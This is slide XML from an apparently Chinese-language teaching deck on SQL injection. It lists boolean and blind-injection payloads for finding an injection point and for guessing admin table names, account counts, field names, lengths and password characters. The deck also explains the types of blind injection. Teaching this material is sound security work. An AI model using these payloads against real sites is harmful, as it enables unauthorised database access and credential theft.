        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54280" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2027238" y="3232785"/>
            <a:ext cx="6923087" cy="2200275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1553210" y="2309495"/>
            <a:ext cx="10691495" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name,last_name FROM users WHERE user_id ='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN"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27860" y="0"/>
            <a:ext cx="9648190" cy="781685"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="96292"/>
            <a:ext cx="32232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常用的SQL注入语句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217805" y="781685"/>
            <a:ext cx="5725795" cy="5908040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>1.判断有无注入点 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>; and 1=1 and 1=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>2.猜表一般的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表的名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>无非是admin adminuser user pass password 等.. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 0&lt;&gt;(select count(*) from *) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 0&lt;&gt;(select count(*) from admin) ---判断是否存在admin这张表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>3.猜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>帐号数目 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>如果遇到0&lt; 返回正确页面 1&lt;返回错误页面说明帐号数目就是1个 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 0&lt;(select count(*) from admin) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1&lt;(select count(*) from admin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>4.猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字段名称 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>在len( ) 括号里面加上我们想到的字段名称. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where len(*)&gt;0)-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where len(用户字段名称name)&gt;0) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where len(_blank&gt;密码字段名称password)&gt;0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6028008" y="781685"/>
            <a:ext cx="6025515" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>5.猜解各个字段的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t> 猜解长度就是把&gt;0变换 直到返回正确页面为止 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where len(*)&gt;0) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where len(name)&gt;6) 错误 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where len(name)&gt;5) 正确 长度是6 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where len(name)=6) 正确</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>猜解字符 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="直接连接符 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1776730" y="2476500"/>
            <a:ext cx="730250" cy="15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173855" y="5492750"/>
            <a:ext cx="730250" cy="15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A68AC3-E6DB-640C-D0FE-CEB716A41F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364722" y="256033"/>
            <a:ext cx="9080518" cy="5035340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421340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345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p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1094740"/>
            <a:ext cx="9519285" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>盲注（Blind SQL Injection）是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不能通过直接显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的途径来获取数据库数据的方法，只能通过页面返回正常不正常来判断是否存在注入。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1956435"/>
            <a:ext cx="7355840" cy="1308735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盲注的基本条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>1、用户能够控制输入；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2、原程序要执行的代码拼接了用户输入的数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440771" y="3720776"/>
            <a:ext cx="2556803" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盲注类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>布尔盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>时间盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>报错型盲注</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345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p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783715" y="1048385"/>
            <a:ext cx="8445500" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>布尔盲注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>猜对了，立马回显。猜错了，报错。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805305" y="1467485"/>
            <a:ext cx="8582025" cy="2314575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647190" y="4023360"/>
            <a:ext cx="9201150" cy="227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6370D4D-6064-5CC7-3797-ABD16D48DA8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1843250" y="239433"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E219D50-E544-A01C-4897-E0FF491D436C}"/>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矩形 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C054A25-7216-5431-9CB5-C91A895274F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="2222083"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p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BA4498-7426-063A-472F-9AE7E6B3F9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2131281" y="1311986"/>
            <a:ext cx="7984269" cy="5013039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>猜测数据库名称的长度</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="381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a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（））</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>截取字符</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="381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a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MID ( </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>abcdefghijklm</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="381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err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> (‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>abcdefghijklm</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2 );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="38100">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Select left (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>abcdefghijklm</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
